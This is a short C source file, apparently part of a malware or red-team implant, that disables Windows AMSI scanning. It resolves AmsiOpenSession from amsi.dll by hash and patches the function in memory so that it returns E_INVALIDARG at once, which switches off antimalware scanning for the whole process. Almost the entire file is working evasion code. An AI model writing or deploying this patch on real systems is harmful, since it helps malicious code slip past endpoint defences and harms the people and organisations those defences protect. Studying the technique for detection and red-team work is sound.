/** * evasion_amsi.c — AMSI bypass * * Patches AmsiOpenSession in amsi.dll to return E_INVALIDARG immediately, * preventing AMSI from scanning any buffers in the current process. */ #include #include #include "api_resolve.h" #ifdef EVASION_AMSI_BYPASS void evasion_amsi_init(void) { /* Load amsi.dll — may not be loaded yet in the process */ HMODULE hAmsi = g_api.pLoadLibraryA("amsi.dll"); if (!hAmsi) return; /* Resolve AmsiOpenSession by hash (amsi.dll is now in PEB) */ FARPROC pFunc = (FARPROC)api_resolve_func(HASH_AMSI, HASH_AmsiOpenSession); if (!pFunc) return; /* Patch: make the function return E_INVALIDARG (0x80070057) * x64 patch: mov eax, 0x80070057; ret * B8 57 00 07 80 C3 */ uint8_t patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; DWORD old_protect; if (g_api.pVirtualProtect((LPVOID)pFunc, sizeof(patch), PAGE_EXECUTE_READWRITE, &old_protect)) { memcpy((LPVOID)pFunc, patch, sizeof(patch)); g_api.pVirtualProtect((LPVOID)pFunc, sizeof(patch), old_protect, &old_protect); } } #endif /* EVASION_AMSI_BYPASS */